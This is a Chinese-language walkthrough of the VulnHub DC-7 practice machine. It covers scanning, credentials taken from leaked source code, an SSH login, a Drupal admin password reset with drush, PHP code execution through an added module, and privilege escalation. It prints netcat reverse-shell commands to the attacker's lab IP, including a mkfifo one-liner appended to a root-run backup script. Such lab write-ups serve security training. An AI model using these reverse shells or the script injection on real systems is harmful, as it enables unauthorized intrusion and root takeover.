DC7

admin 2025年2月19日14:38:48评论6 views字数 1303阅读4分20秒阅读模式

DC7

靶机地址:https://www.vulnhub.com/entry/dc-7,356/

攻击者ip:192.168.56.108 桥接(自动) vmare

受害者ip:192.168.56.121 仅主机 vmbox

参考:https://blog.csdn.net/xdbzdgx/article/details/121729759

https://blog.csdn.net/weixin_43583637/article/details/102809227

https://blog.csdn.net/weixin_50053818/article/details/117400362

主机发现

DC7

端口扫描,22ssh,80http

DC7

输入“会有提示

DC7

框架是Drupal

cmseek -u http://192.168.56.121/

DC7

dirb http://192.168.56.121/

扫描目录,找到robots.txt,

在robots.txt找到后台登陆入口

http://192.168.56.121/user/login/

DC7

有防爆破

DC7

欢迎来到DC-7            DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 😃            尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破解或字典攻击,您可能不会成功。            您将要做的就是在盒子外面思考。            方式在盒子外面。 😃            

搜索@DC7USER

DC7

源码泄露,在confing.php找到账号密码

dc7user/MdR3xOgB7#dW

DC7

拿去登陆后台,密码错误

试一下ssh服务登录,登陆成功了

DC7

mbox是root发的邮件

DC7

cat /opt/scripts/backups.sh查看这个文件

gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码

进入到/var/www/html目录下,猜测会有一个admin用户,所以使用drush命令修改admin用户的密码为123456,发现可以修改成功

cd /var/www/html/            drush user-password admin --password="123456"            

DC7

在Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

DC7

安装模块

https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz            

DC7

DC7

DC7

DC7

DC7

回到之前的页面,可以添加php代码了

DC7

写上一句马

DC7

nc -e /bin/sh 192.168.56.108 2222

反弹shell

python -c 'import pty; pty.spawn("/bin/bash")'

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.108 3333 >/tmp/f" >> backups.sh            

DC7

DC7

原文始发于微信公众号(王之暴龙战神):DC7

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月19日14:38:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC7https://cn-sec.com/archives/3758702.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息